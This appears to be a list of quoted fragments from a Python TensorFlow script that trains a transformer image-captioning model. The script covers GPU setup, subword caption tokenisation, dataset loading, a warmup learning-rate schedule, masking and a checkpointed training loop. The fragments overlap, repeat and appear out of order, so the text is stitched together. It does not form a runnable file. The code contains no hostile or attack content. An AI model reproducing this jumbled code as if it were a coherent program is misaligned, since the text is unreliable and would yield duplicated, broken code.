"tf.config.experimental.set_memory_growth(gpus[0], True) tf.config.experimental.set_visible_devices(gpus[0], 'GPU') logical_gpus = tf.config.experimental.list_logical_devices('GPU') print(len(gpus), \"Physical GPUs,\", len(logical_gpus), \"Logical GPU\")", "can be seen by TF tf.config.list_physical_devices('GPU') # tf.debugging.set_log_device_placement(True) # only to check GPU", "# which cover 99% of the captions without truncation max_len = int(lens.quantile(0.99) +", "checkpoint exists, restore the latest checkpoint. if ckpt_manager.latest_checkpoint: ckpt.restore(ckpt_manager.latest_checkpoint) print('Latest checkpoint restored!!') #########################", "in the 1st attention block in the decoder. # It is used to", "= tar[:, :-1] tar_real = tar[:, 1:] enc_padding_mask, combined_mask, dec_padding_mask = create_masks(inp, tar_inp)", "Learning Rate Schedule, as per `Attention is All You Need' paper class CustomSchedule(tf.keras.optimizers.schedules.LearningRateSchedule):", "name of the saved image feature file inputs['img_features'] = inputs['image'].map(lambda x: save_prefix +", "pred): mask = tf.math.logical_not(tf.math.equal(real, 0)) loss_ = loss_object(real, pred) mask = tf.cast(mask, dtype=loss_.dtype)", "tf.float32) self.warmup_steps = warmup_steps def __call__(self, step): arg1 = tf.math.rsqrt(step) arg2 = step", "# img_train, img_val, cap_train, cap_val = train_test_split(img_names, # captions, # test_size=0.2, # random_state=42)", "inputs = pd.read_csv(annot, header=None, names=[\"caption\", \"image\"]) print(\"Data file loaded\") ######################### # Tokenize Captions", "captions # which cover 99% of the captions without truncation max_len = int(lens.quantile(0.99)", "import matplotlib.pyplot as plt # temp_learning_rate_schedule = CustomSchedule(d_model) # # plt.plot(temp_learning_rate_schedule(tf.range(40000, dtype=tf.float32))) #", "mask return tf.reduce_sum(loss_) / tf.reduce_sum(mask) train_loss = tf.keras.metrics.Mean(name='train_loss') train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy( name='train_accuracy') #########################", "= tf.math.rsqrt(step) arg2 = step * (self.warmup_steps ** -1.5) return tf.math.rsqrt(self.d_model) * tf.math.minimum(arg1,", "= inputs.img_features.tolist() # we only took half validation examples so we dont need", "dropout_rate = 0.1 EPOCHS = 20 # should see results in 4-10 epochs", "cap_val = train_test_split(img_names, # captions, # test_size=0.2, # random_state=42) img_train, cap_train = img_names,", "plt.plot(temp_learning_rate_schedule(tf.range(40000, dtype=tf.float32))) # plt.ylabel(\"Learning Rate\") # plt.xlabel(\"Train Step\") ######################### # Loss and Metrics", "* tf.math.minimum(arg1, arg2) learning_rate = CustomSchedule(d_model) optimizer = tf.keras.optimizers.Adam(learning_rate, beta_1=0.9, beta_2=0.98, epsilon=1e-9) #", "for epoch {} at {}'.format(epoch + 1, ckpt_save_path)) print('Epoch {} Loss {:.6f} Accuracy", "self.warmup_steps = warmup_steps def __call__(self, step): arg1 = tf.math.rsqrt(step) arg2 = step *", "a checkpoint exists, restore the latest checkpoint. if ckpt_manager.latest_checkpoint: ckpt.restore(ckpt_manager.latest_checkpoint) print('Latest checkpoint restored!!')", "Begin Training for epoch in range(EPOCHS): start_tm = time.time() train_loss.reset_states() train_accuracy.reset_states() # inp", "= warmup_steps def __call__(self, step): arg1 = tf.math.rsqrt(step) arg2 = step * (self.warmup_steps", "tqdm import tqdm # our visual transformer code import visual_transformer as vt #######", "img_names = inputs.img_features.tolist() # we only took half validation examples so we dont", "int(max_len - len(x)) return x[:max_len] inputs['tokens'] = inputs.tokenized.map(lambda x: tokenize_pad(x)) print(\"Captions tokenized and", "# # plt.plot(temp_learning_rate_schedule(tf.range(40000, dtype=tf.float32))) # plt.ylabel(\"Learning Rate\") # plt.xlabel(\"Train Step\") ######################### # Loss", "enc_padding_mask = vt.create_padding_mask(inp_seq) # Used in the 2nd attention block in the decoder.", "print('Saving checkpoint for epoch {} at {}'.format(epoch + 1, ckpt_save_path)) print('Epoch {} Loss", "(epoch + 1) % 2 == 0: ckpt_save_path = ckpt_manager.save() print('Saving checkpoint for", "check GPU usage gpus = tf.config.experimental.list_physical_devices('GPU') if gpus: # Restrict TensorFlow to only", "the size and complexity of the model # BERT (base) uses 12 layers,", "usage gpus = tf.config.experimental.list_physical_devices('GPU') if gpus: # Restrict TensorFlow to only use the", "x: tokenize_pad(x)) print(\"Captions tokenized and padded/truncated\") # now to compute a column with", "__call__(self, step): arg1 = tf.math.rsqrt(step) arg2 = step * (self.warmup_steps ** -1.5) return", "parameters control the size and complexity of the model # BERT (base) uses", "= loss_object(real, pred) mask = tf.cast(mask, dtype=loss_.dtype) loss_ *= mask return tf.reduce_sum(loss_) /", "x.lower().strip() + end) print(\"Some prepared captions: \", inputs.tokenized[:5]) def tokenize_pad(x): x = cap_tokenizer.encode(x)", "load_img import tensorflow_datasets as tfds import numpy as np import pandas as pd", "split # img_train, img_val, cap_train, cap_val = train_test_split(img_names, # captions, # test_size=0.2, #", "'GPU') logical_gpus = tf.config.experimental.list_logical_devices('GPU') print(len(gpus), \"Physical GPUs,\", len(logical_gpus), \"Logical GPU\") except RuntimeError as", "also transformer = vt.Transformer(num_layers, d_model, num_heads, dff, target_vocab_size, pe_input=49, # 7x7 pixels pe_target=target_vocab_size,", "= transformer(inp, tar_inp, True, enc_padding_mask, combined_mask, dec_padding_mask) loss = loss_function(tar_real, predictions) gradients =", "-> images, tar -> caption for (batch, (inp, tar)) in enumerate(dataset): train_step(inp, tar)", "{} at {}'.format(epoch + 1, ckpt_save_path)) print('Epoch {} Loss {:.6f} Accuracy {:.6f}'.format(epoch +", "# Helper function for creating masks def create_masks(inp, tar): # Encoder padding mask", "# To verify for img, cap in dataset.take(2): print(img.shape) print(cap.numpy()) print(\"Training dataset prepared.\")", "for img, cap in dataset.take(2): print(img.shape) print(cap.numpy()) print(\"Training dataset prepared.\") ######################### # Build", "of captions split by spaces lens = inputs['caption'].map(lambda x: len(x.split())) # Max length", "batch, train_loss.result(), train_accuracy.result())) if (epoch + 1) % 2 == 0: ckpt_save_path =", "All You Need' paper class CustomSchedule(tf.keras.optimizers.schedules.LearningRateSchedule): def __init__(self, d_model, warmup_steps=4000): super(CustomSchedule, self).__init__() self.d_model", "function for creating masks def create_masks(inp, tar): # Encoder padding mask - This", "batch dataset = dataset.shuffle(BUFFER_SIZE).batch(BATCH_SIZE) dataset = dataset.prefetch(buffer_size=tf.data.experimental.AUTOTUNE) # Perform one step of raining", "train_test_split import json from glob import glob from PIL import Image import pickle", "lens = inputs['caption'].map(lambda x: len(cap_tokenizer.encode(x.lower()))) # We will set this as the max", "= tf.keras.optimizers.Adam(learning_rate, beta_1=0.9, beta_2=0.98, epsilon=1e-9) # Visualize the schedule: uncomment to plot #", "max_to_keep=5) # if a checkpoint exists, restore the latest checkpoint. if ckpt_manager.latest_checkpoint: ckpt.restore(ckpt_manager.latest_checkpoint)", "\"./checkpoints/train-small-model-nope-20ep\" ckpt = tf.train.Checkpoint(transformer=transformer, optimizer=optimizer) ckpt_manager = tf.train.CheckpointManager(ckpt, checkpoint_path, max_to_keep=5) # if a", "We will set this as the max length of captions # which cover", "= tf.keras.metrics.Mean(name='train_loss') train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy( name='train_accuracy') ######################### # Helper function for creating masks", "< max_len: x = x + [0] * int(max_len - len(x)) return x[:max_len]", "a surfboard.\".lower())) print(\"Tokenizer hydrated\") # Max length of captions split by spaces lens", "ResNet50 feature def load_image_feature(img_name, cap): img_tensor = np.load(img_name.decode('utf-8')) return img_tensor, cap dataset =", "1000 BATCH_SIZE = 64 # can reduce or increase depending on GPU capacity", "# as per BERT paper # num_heads = 12 target_vocab_size = cap_tokenizer.vocab_size #", "so we dont need to split # img_train, img_val, cap_train, cap_val = train_test_split(img_names,", "attention heads # and 4H (4x768) as feedforward size # Small Model num_layers", "cap_train)) # Use map to load the numpy files in parallel dataset =", "item2], [tf.float32, tf.int32]), num_parallel_calls=tf.data.experimental.AUTOTUNE) # To verify for img, cap in dataset.take(2): print(img.shape)", "fits in memory lens = inputs['caption'].map(lambda x: len(cap_tokenizer.encode(x.lower()))) # We will set this", "on GPU ## tf.keras.backend.clear_session() # - for easy reset of notebook state #", "files in parallel dataset = dataset.map(lambda item1, item2: tf.numpy_function( load_image_feature, [item1, item2], [tf.float32,", "GPU capacity # Shuffle and batch dataset = dataset.shuffle(BUFFER_SIZE).batch(BATCH_SIZE) dataset = dataset.prefetch(buffer_size=tf.data.experimental.AUTOTUNE) #", "# Learning Rate Schedule, as per `Attention is All You Need' paper class", "\"Physical GPUs,\", len(logical_gpus), \"Logical GPU\") except RuntimeError as e: # Visible devices must", "tf.cast(mask, dtype=loss_.dtype) loss_ *= mask return tf.reduce_sum(loss_) / tf.reduce_sum(mask) train_loss = tf.keras.metrics.Mean(name='train_loss') train_accuracy", "dataset.shuffle(BUFFER_SIZE).batch(BATCH_SIZE) dataset = dataset.prefetch(buffer_size=tf.data.experimental.AUTOTUNE) # Perform one step of raining on one batch", "demonstrated in earlier chapters # This is a quick way if data fits", "# Loss and Metrics loss_object = tf.keras.losses.SparseCategoricalCrossentropy( from_logits=True, reduction='none') def loss_function(real, pred): mask", "ckpt_manager.save() print('Saving checkpoint for epoch {} at {}'.format(epoch + 1, ckpt_save_path)) print('Epoch {}", "= vt.create_padding_mask(inp_seq) # Used in the 2nd attention block in the decoder. #", "the model # BERT (base) uses 12 layers, 768 as embedding dim, 12", "state # chck if GPU can be seen by TF tf.config.list_physical_devices('GPU') # tf.debugging.set_log_device_placement(True)", "\"image\"]) print(\"Data file loaded\") ######################### # Tokenize Captions ######################### cap_tokenizer = tfds.features.text.SubwordTextEncoder.load_from_file( \"captions\")", "+ [0] * int(max_len - len(x)) return x[:max_len] inputs['tokens'] = inputs.tokenized.map(lambda x: tokenize_pad(x))", "Used in the 1st attention block in the decoder. # It is used", "0: ts = datetime.datetime.now().strftime(\"%d-%b-%Y (%H:%M:%S)\") print('[{}] Epoch {} Batch {} Loss {:.6f} Accuracy", "setup training parameters BUFFER_SIZE = 1000 BATCH_SIZE = 64 # can reduce or", "parameters BUFFER_SIZE = 1000 BATCH_SIZE = 64 # can reduce or increase depending", "1:] enc_padding_mask, combined_mask, dec_padding_mask = create_masks(inp, tar_inp) with tf.GradientTape() as tape: predictions, _", "mapping captions to images ######################### prefix = './data/' save_prefix = prefix + \"features/\"", "temp_learning_rate_schedule = CustomSchedule(d_model) # # plt.plot(temp_learning_rate_schedule(tf.range(40000, dtype=tf.float32))) # plt.ylabel(\"Learning Rate\") # plt.xlabel(\"Train Step\")", "= pd.read_csv(annot, header=None, names=[\"caption\", \"image\"]) print(\"Data file loaded\") ######################### # Tokenize Captions #########################", "look_ahead_mask) return enc_padding_mask, combined_mask, dec_padding_mask # Checkpoints setup checkpoint_path = \"./checkpoints/train-small-model-nope-20ep\" ckpt =", "These parameters control the size and complexity of the model # BERT (base)", "Base Model # num_layers = 12 # d_model = 768 # dff =", "Rate Schedule, as per `Attention is All You Need' paper class CustomSchedule(tf.keras.optimizers.schedules.LearningRateSchedule): def", "= cap_tokenizer.vocab_size # already includes start/end tokens dropout_rate = 0.1 EPOCHS = 20", "pe_target=target_vocab_size, rate=dropout_rate, use_pe=False ) ######################### # Training Setup ######################### # Learning Rate Schedule,", "initialized print(e) ############################################### ######################### # Load Data file mapping captions to images #########################", "Load the numpy file with extracted ResNet50 feature def load_image_feature(img_name, cap): img_tensor =", "from PIL import Image import pickle import re import os import time import", "first GPU try: tf.config.experimental.set_memory_growth(gpus[0], True) tf.config.experimental.set_visible_devices(gpus[0], 'GPU') logical_gpus = tf.config.experimental.list_logical_devices('GPU') print(len(gpus), \"Physical GPUs,\",", "# we only took half validation examples so we dont need to split", "save_prefix + x.split('/')[-1][:-3] + 'npy') ######################### # Prepare tf.DataSet for training ######################### captions", "as np import pandas as pd from sklearn.model_selection import train_test_split import json from", "GPU CONFIGS FOR RTX 2070/NVidia GPU ############### ## Please comment out if not", "inputs['tokenized'] = inputs['caption'].map( lambda x: start + x.lower().strip() + end) print(\"Some prepared captions:", "the 1st attention block in the decoder. # It is used to pad", "1, train_loss.result(), train_accuracy.result())) print('Time taken for 1 epoch: {} secs\\n'.format(time.time() - start_tm)) transformer.summary()", "(base) uses 12 layers, 768 as embedding dim, 12 attention heads # and", "[0] * int(max_len - len(x)) return x[:max_len] inputs['tokens'] = inputs.tokenized.map(lambda x: tokenize_pad(x)) print(\"Captions", "loss_function(tar_real, predictions) gradients = tape.gradient(loss, transformer.trainable_variables) optimizer.apply_gradients(zip(gradients, transformer.trainable_variables)) train_loss(loss) train_accuracy(tar_real, predictions) # Begin", "dim, 12 attention heads # and 4H (4x768) as feedforward size # Small", "transformer = vt.Transformer(num_layers, d_model, num_heads, dff, target_vocab_size, pe_input=49, # 7x7 pixels pe_target=target_vocab_size, rate=dropout_rate,", "= CustomSchedule(d_model) # # plt.plot(temp_learning_rate_schedule(tf.range(40000, dtype=tf.float32))) # plt.ylabel(\"Learning Rate\") # plt.xlabel(\"Train Step\") #########################", "ckpt_manager.latest_checkpoint: ckpt.restore(ckpt_manager.latest_checkpoint) print('Latest checkpoint restored!!') ######################### # Training Loops ######################### # setup training", "use the first GPU try: tf.config.experimental.set_memory_growth(gpus[0], True) tf.config.experimental.set_visible_devices(gpus[0], 'GPU') logical_gpus = tf.config.experimental.list_logical_devices('GPU') print(len(gpus),", "tf.math.minimum(arg1, arg2) learning_rate = CustomSchedule(d_model) optimizer = tf.keras.optimizers.Adam(learning_rate, beta_1=0.9, beta_2=0.98, epsilon=1e-9) # Visualize", "gpus = tf.config.experimental.list_physical_devices('GPU') if gpus: # Restrict TensorFlow to only use the first", "loss_function(real, pred): mask = tf.math.logical_not(tf.math.equal(real, 0)) loss_ = loss_object(real, pred) mask = tf.cast(mask,", "running CuDNN on GPU ## tf.keras.backend.clear_session() # - for easy reset of notebook", "training parameters BUFFER_SIZE = 1000 BATCH_SIZE = 64 # can reduce or increase", "step): arg1 = tf.math.rsqrt(step) arg2 = step * (self.warmup_steps ** -1.5) return tf.math.rsqrt(self.d_model)", "mask = tf.math.logical_not(tf.math.equal(real, 0)) loss_ = loss_object(real, pred) mask = tf.cast(mask, dtype=loss_.dtype) loss_", "tf.cast(self.d_model, tf.float32) self.warmup_steps = warmup_steps def __call__(self, step): arg1 = tf.math.rsqrt(step) arg2 =", "GPUs,\", len(logical_gpus), \"Logical GPU\") except RuntimeError as e: # Visible devices must be", "20 # should see results in 4-10 epochs also transformer = vt.Transformer(num_layers, d_model,", "now to compute a column with the new name of the saved image", "** -1.5) return tf.math.rsqrt(self.d_model) * tf.math.minimum(arg1, arg2) learning_rate = CustomSchedule(d_model) optimizer = tf.keras.optimizers.Adam(learning_rate,", "# This padding mask is used to mask the encoder outputs. dec_padding_mask =", "dff, target_vocab_size, pe_input=49, # 7x7 pixels pe_target=target_vocab_size, rate=dropout_rate, use_pe=False ) ######################### # Training", "= vt.create_padding_mask(inp_seq) # Used in the 1st attention block in the decoder. #", "# Small Model num_layers = 4 d_model = 128 dff = d_model *", "schedule: uncomment to plot # import matplotlib.pyplot as plt # temp_learning_rate_schedule = CustomSchedule(d_model)", "and batch dataset = dataset.shuffle(BUFFER_SIZE).batch(BATCH_SIZE) dataset = dataset.prefetch(buffer_size=tf.data.experimental.AUTOTUNE) # Perform one step of", "############################################### ######################### # Load Data file mapping captions to images ######################### prefix =", "in memory lens = inputs['caption'].map(lambda x: len(cap_tokenizer.encode(x.lower()))) # We will set this as", "= x + [0] * int(max_len - len(x)) return x[:max_len] inputs['tokens'] = inputs.tokenized.map(lambda", "in the decoder. # This padding mask is used to mask the encoder", "if GPU can be seen by TF tf.config.list_physical_devices('GPU') # tf.debugging.set_log_device_placement(True) # only to", "To verify for img, cap in dataset.take(2): print(img.shape) print(cap.numpy()) print(\"Training dataset prepared.\") #########################", "tf.int32]), num_parallel_calls=tf.data.experimental.AUTOTUNE) # To verify for img, cap in dataset.take(2): print(img.shape) print(cap.numpy()) print(\"Training", "# only to check GPU usage gpus = tf.config.experimental.list_physical_devices('GPU') if gpus: # Restrict", "4-10 epochs also transformer = vt.Transformer(num_layers, d_model, num_heads, dff, target_vocab_size, pe_input=49, # 7x7", "loss = loss_function(tar_real, predictions) gradients = tape.gradient(loss, transformer.trainable_variables) optimizer.apply_gradients(zip(gradients, transformer.trainable_variables)) train_loss(loss) train_accuracy(tar_real, predictions)", "of raining on one batch in an epoch @tf.function def train_step(inp, tar): tar_inp", "except RuntimeError as e: # Visible devices must be set before GPUs have", "preprocess_input from tensorflow.keras.preprocessing.image import img_to_array from tensorflow.keras.preprocessing.image import load_img import tensorflow_datasets as tfds", "import tqdm # our visual transformer code import visual_transformer as vt ####### GPU", "= '<s>' end = '</s>' inputs['tokenized'] = inputs['caption'].map( lambda x: start + x.lower().strip()", "the decoder. # It is used to pad and mask future tokens in", "_ = transformer(inp, tar_inp, True, enc_padding_mask, combined_mask, dec_padding_mask) loss = loss_function(tar_real, predictions) gradients", "# can reduce or increase depending on GPU capacity # Shuffle and batch", "is used to mask the encoder outputs. dec_padding_mask = vt.create_padding_mask(inp_seq) # Used in", "this as the max length of captions # which cover 99% of the", "map to load the numpy files in parallel dataset = dataset.map(lambda item1, item2:", "= CustomSchedule(d_model) optimizer = tf.keras.optimizers.Adam(learning_rate, beta_1=0.9, beta_2=0.98, epsilon=1e-9) # Visualize the schedule: uncomment", "tf from tensorflow.keras.applications.resnet50 import preprocess_input from tensorflow.keras.preprocessing.image import img_to_array from tensorflow.keras.preprocessing.image import load_img", "= d_model self.d_model = tf.cast(self.d_model, tf.float32) self.warmup_steps = warmup_steps def __call__(self, step): arg1", "used enc_padding_mask = vt.create_padding_mask(inp_seq) # Used in the 2nd attention block in the", "matplotlib.pyplot as plt # temp_learning_rate_schedule = CustomSchedule(d_model) # # plt.plot(temp_learning_rate_schedule(tf.range(40000, dtype=tf.float32))) # plt.ylabel(\"Learning", "ckpt_manager = tf.train.CheckpointManager(ckpt, checkpoint_path, max_to_keep=5) # if a checkpoint exists, restore the latest", "train_loss = tf.keras.metrics.Mean(name='train_loss') train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy( name='train_accuracy') ######################### # Helper function for creating", "import glob from PIL import Image import pickle import re import os import", "tf.keras.optimizers.Adam(learning_rate, beta_1=0.9, beta_2=0.98, epsilon=1e-9) # Visualize the schedule: uncomment to plot # import", "= prefix + 'data.csv' inputs = pd.read_csv(annot, header=None, names=[\"caption\", \"image\"]) print(\"Data file loaded\")", "12 attention heads # and 4H (4x768) as feedforward size # Small Model", "= tf.cast(self.d_model, tf.float32) self.warmup_steps = warmup_steps def __call__(self, step): arg1 = tf.math.rsqrt(step) arg2", "def create_masks(inp, tar): # Encoder padding mask - This should just be 1's", "# Prepare tf.DataSet for training ######################### captions = inputs.tokens.tolist() img_names = inputs.img_features.tolist() #", "to be used enc_padding_mask = vt.create_padding_mask(inp_seq) # Used in the 2nd attention block", "= int(lens.quantile(0.99) + 1) # for special tokens start = '<s>' end =", "padding mask is used to mask the encoder outputs. dec_padding_mask = vt.create_padding_mask(inp_seq) #", "import Image import pickle import re import os import time import datetime from", "# if a checkpoint exists, restore the latest checkpoint. if ckpt_manager.latest_checkpoint: ckpt.restore(ckpt_manager.latest_checkpoint) print('Latest", "one step of raining on one batch in an epoch @tf.function def train_step(inp,", "# test_size=0.2, # random_state=42) img_train, cap_train = img_names, captions # Load the numpy", "received by # the decoder. look_ahead_mask = vt.create_look_ahead_mask(tf.shape(tar)[1]) dec_target_padding_mask = vt.create_padding_mask(tar) combined_mask =", "GPU try: tf.config.experimental.set_memory_growth(gpus[0], True) tf.config.experimental.set_visible_devices(gpus[0], 'GPU') logical_gpus = tf.config.experimental.list_logical_devices('GPU') print(len(gpus), \"Physical GPUs,\", len(logical_gpus),", "tfds.features.text.SubwordTextEncoder.load_from_file( \"captions\") print(cap_tokenizer.encode(\"A man riding a wave on top of a surfboard.\".lower())) print(\"Tokenizer", "of the captions without truncation max_len = int(lens.quantile(0.99) + 1) # for special", "img, cap in dataset.take(2): print(img.shape) print(cap.numpy()) print(\"Training dataset prepared.\") ######################### # Build Transformer", "padding mask - This should just be 1's # input shape should be", "saved image feature file inputs['img_features'] = inputs['image'].map(lambda x: save_prefix + x.split('/')[-1][:-3] + 'npy')", "[item1, item2], [tf.float32, tf.int32]), num_parallel_calls=tf.data.experimental.AUTOTUNE) # To verify for img, cap in dataset.take(2):", "predictions) # Begin Training for epoch in range(EPOCHS): start_tm = time.time() train_loss.reset_states() train_accuracy.reset_states()", "Load Data file mapping captions to images ######################### prefix = './data/' save_prefix =", "predictions, _ = transformer(inp, tar_inp, True, enc_padding_mask, combined_mask, dec_padding_mask) loss = loss_function(tar_real, predictions)", "tokenize_pad(x): x = cap_tokenizer.encode(x) if len(x) < max_len: x = x + [0]", "= tf.config.experimental.list_physical_devices('GPU') if gpus: # Restrict TensorFlow to only use the first GPU", "tf.config.experimental.set_visible_devices(gpus[0], 'GPU') logical_gpus = tf.config.experimental.list_logical_devices('GPU') print(len(gpus), \"Physical GPUs,\", len(logical_gpus), \"Logical GPU\") except RuntimeError", "man riding a wave on top of a surfboard.\".lower())) print(\"Tokenizer hydrated\") # Max", "= time.time() train_loss.reset_states() train_accuracy.reset_states() # inp -> images, tar -> caption for (batch,", "img_tensor = np.load(img_name.decode('utf-8')) return img_tensor, cap dataset = tf.data.Dataset.from_tensor_slices((img_train, cap_train)) # Use map", "num_layers = 4 d_model = 128 dff = d_model * 4 num_heads =", "num_heads, dff, target_vocab_size, pe_input=49, # 7x7 pixels pe_target=target_vocab_size, rate=dropout_rate, use_pe=False ) ######################### #", "to plot # import matplotlib.pyplot as plt # temp_learning_rate_schedule = CustomSchedule(d_model) # #", "plt.ylabel(\"Learning Rate\") # plt.xlabel(\"Train Step\") ######################### # Loss and Metrics loss_object = tf.keras.losses.SparseCategoricalCrossentropy(", "results in 4-10 epochs also transformer = vt.Transformer(num_layers, d_model, num_heads, dff, target_vocab_size, pe_input=49,", "as tape: predictions, _ = transformer(inp, tar_inp, True, enc_padding_mask, combined_mask, dec_padding_mask) loss =", "special tokens start = '<s>' end = '</s>' inputs['tokenized'] = inputs['caption'].map( lambda x:", "layers, 768 as embedding dim, 12 attention heads # and 4H (4x768) as", "import datetime from tqdm import tqdm # our visual transformer code import visual_transformer", "[tf.float32, tf.int32]), num_parallel_calls=tf.data.experimental.AUTOTUNE) # To verify for img, cap in dataset.take(2): print(img.shape) print(cap.numpy())", "in range(EPOCHS): start_tm = time.time() train_loss.reset_states() train_accuracy.reset_states() # inp -> images, tar ->", "# Tokenize Captions ######################### cap_tokenizer = tfds.features.text.SubwordTextEncoder.load_from_file( \"captions\") print(cap_tokenizer.encode(\"A man riding a wave", "99% of the captions without truncation max_len = int(lens.quantile(0.99) + 1) # for", "plt.xlabel(\"Train Step\") ######################### # Loss and Metrics loss_object = tf.keras.losses.SparseCategoricalCrossentropy( from_logits=True, reduction='none') def", "cap_tokenizer.vocab_size # already includes start/end tokens dropout_rate = 0.1 EPOCHS = 20 #", "BUFFER_SIZE = 1000 BATCH_SIZE = 64 # can reduce or increase depending on", "on top of a surfboard.\".lower())) print(\"Tokenizer hydrated\") # Max length of captions split", "in 4-10 epochs also transformer = vt.Transformer(num_layers, d_model, num_heads, dff, target_vocab_size, pe_input=49, #", "a quick way if data fits in memory lens = inputs['caption'].map(lambda x: len(cap_tokenizer.encode(x.lower())))", "should be (batch_size, 49, 2048) inp_seq = tf.ones([inp.shape[0], inp.shape[1]]) # all pixels to", "## ## this is important for running CuDNN on GPU ## tf.keras.backend.clear_session() #", "depending on GPU capacity # Shuffle and batch dataset = dataset.shuffle(BUFFER_SIZE).batch(BATCH_SIZE) dataset =", "after tokenization # tfds demonstrated in earlier chapters # This is a quick", "an epoch @tf.function def train_step(inp, tar): tar_inp = tar[:, :-1] tar_real = tar[:,", "GPU ## tf.keras.backend.clear_session() # - for easy reset of notebook state # chck", "= inputs['caption'].map( lambda x: start + x.lower().strip() + end) print(\"Some prepared captions: \",", "Model # num_layers = 12 # d_model = 768 # dff = d_model", "inputs.tokenized.map(lambda x: tokenize_pad(x)) print(\"Captions tokenized and padded/truncated\") # now to compute a column", "training ######################### captions = inputs.tokens.tolist() img_names = inputs.img_features.tolist() # we only took half", "= inputs.tokenized.map(lambda x: tokenize_pad(x)) print(\"Captions tokenized and padded/truncated\") # now to compute a", "Tokenize Captions ######################### cap_tokenizer = tfds.features.text.SubwordTextEncoder.load_from_file( \"captions\") print(cap_tokenizer.encode(\"A man riding a wave on", "captions split by spaces lens = inputs['caption'].map(lambda x: len(x.split())) # Max length of", "images, tar -> caption for (batch, (inp, tar)) in enumerate(dataset): train_step(inp, tar) if", "x = cap_tokenizer.encode(x) if len(x) < max_len: x = x + [0] *", "Helper function for creating masks def create_masks(inp, tar): # Encoder padding mask -", "if gpus: # Restrict TensorFlow to only use the first GPU try: tf.config.experimental.set_memory_growth(gpus[0],", "of the model # BERT (base) uses 12 layers, 768 as embedding dim,", "if data fits in memory lens = inputs['caption'].map(lambda x: len(cap_tokenizer.encode(x.lower()))) # We will", "end = '</s>' inputs['tokenized'] = inputs['caption'].map( lambda x: start + x.lower().strip() + end)", "plot # import matplotlib.pyplot as plt # temp_learning_rate_schedule = CustomSchedule(d_model) # # plt.plot(temp_learning_rate_schedule(tf.range(40000,", "Transformer Model ######################### # These parameters control the size and complexity of the", "the first GPU try: tf.config.experimental.set_memory_growth(gpus[0], True) tf.config.experimental.set_visible_devices(gpus[0], 'GPU') logical_gpus = tf.config.experimental.list_logical_devices('GPU') print(len(gpus), \"Physical", "to compute a column with the new name of the saved image feature", "import json from glob import glob from PIL import Image import pickle import", "* int(max_len - len(x)) return x[:max_len] inputs['tokens'] = inputs.tokenized.map(lambda x: tokenize_pad(x)) print(\"Captions tokenized", "Accuracy {:.6f}'.format( ts, epoch + 1, batch, train_loss.result(), train_accuracy.result())) if (epoch + 1)", "inputs['caption'].map(lambda x: len(cap_tokenizer.encode(x.lower()))) # We will set this as the max length of", "checkpoint restored!!') ######################### # Training Loops ######################### # setup training parameters BUFFER_SIZE =", "= 64 # can reduce or increase depending on GPU capacity # Shuffle", "def loss_function(real, pred): mask = tf.math.logical_not(tf.math.equal(real, 0)) loss_ = loss_object(real, pred) mask =", "tar_inp) with tf.GradientTape() as tape: predictions, _ = transformer(inp, tar_inp, True, enc_padding_mask, combined_mask,", "datetime.datetime.now().strftime(\"%d-%b-%Y (%H:%M:%S)\") print('[{}] Epoch {} Batch {} Loss {:.6f} Accuracy {:.6f}'.format( ts, epoch", "# temp_learning_rate_schedule = CustomSchedule(d_model) # # plt.plot(temp_learning_rate_schedule(tf.range(40000, dtype=tf.float32))) # plt.ylabel(\"Learning Rate\") # plt.xlabel(\"Train", "beta_2=0.98, epsilon=1e-9) # Visualize the schedule: uncomment to plot # import matplotlib.pyplot as", "= tf.cast(mask, dtype=loss_.dtype) loss_ *= mask return tf.reduce_sum(loss_) / tf.reduce_sum(mask) train_loss = tf.keras.metrics.Mean(name='train_loss')", "prepared.\") ######################### # Build Transformer Model ######################### # These parameters control the size", "cap in dataset.take(2): print(img.shape) print(cap.numpy()) print(\"Training dataset prepared.\") ######################### # Build Transformer Model", "tf.train.CheckpointManager(ckpt, checkpoint_path, max_to_keep=5) # if a checkpoint exists, restore the latest checkpoint. if", "memory lens = inputs['caption'].map(lambda x: len(cap_tokenizer.encode(x.lower()))) # We will set this as the", "= 0.1 EPOCHS = 20 # should see results in 4-10 epochs also", "before GPUs have been initialized print(e) ############################################### ######################### # Load Data file mapping", "tfds demonstrated in earlier chapters # This is a quick way if data", "CONFIGS FOR RTX 2070/NVidia GPU ############### ## Please comment out if not training", "= 8 # BERT Base Model # num_layers = 12 # d_model =", "json from glob import glob from PIL import Image import pickle import re", "mask future tokens in the input received by # the decoder. look_ahead_mask =", "and Metrics loss_object = tf.keras.losses.SparseCategoricalCrossentropy( from_logits=True, reduction='none') def loss_function(real, pred): mask = tf.math.logical_not(tf.math.equal(real,", "dataset prepared.\") ######################### # Build Transformer Model ######################### # These parameters control the", "verify for img, cap in dataset.take(2): print(img.shape) print(cap.numpy()) print(\"Training dataset prepared.\") ######################### #", "BATCH_SIZE = 64 # can reduce or increase depending on GPU capacity #", "d_model, num_heads, dff, target_vocab_size, pe_input=49, # 7x7 pixels pe_target=target_vocab_size, rate=dropout_rate, use_pe=False ) #########################", "captions, # test_size=0.2, # random_state=42) img_train, cap_train = img_names, captions # Load the", "is important for running CuDNN on GPU ## tf.keras.backend.clear_session() # - for easy", "print(len(gpus), \"Physical GPUs,\", len(logical_gpus), \"Logical GPU\") except RuntimeError as e: # Visible devices", "1) # for special tokens start = '<s>' end = '</s>' inputs['tokenized'] =", "tar[:, :-1] tar_real = tar[:, 1:] enc_padding_mask, combined_mask, dec_padding_mask = create_masks(inp, tar_inp) with", "\"captions\") print(cap_tokenizer.encode(\"A man riding a wave on top of a surfboard.\".lower())) print(\"Tokenizer hydrated\")", "heads # and 4H (4x768) as feedforward size # Small Model num_layers =", "4 # as per BERT paper # num_heads = 12 target_vocab_size = cap_tokenizer.vocab_size", "truncation max_len = int(lens.quantile(0.99) + 1) # for special tokens start = '<s>'", "file loaded\") ######################### # Tokenize Captions ######################### cap_tokenizer = tfds.features.text.SubwordTextEncoder.load_from_file( \"captions\") print(cap_tokenizer.encode(\"A man", "return tf.reduce_sum(loss_) / tf.reduce_sum(mask) train_loss = tf.keras.metrics.Mean(name='train_loss') train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy( name='train_accuracy') ######################### #", "the numpy file with extracted ResNet50 feature def load_image_feature(img_name, cap): img_tensor = np.load(img_name.decode('utf-8'))", "quick way if data fits in memory lens = inputs['caption'].map(lambda x: len(cap_tokenizer.encode(x.lower()))) 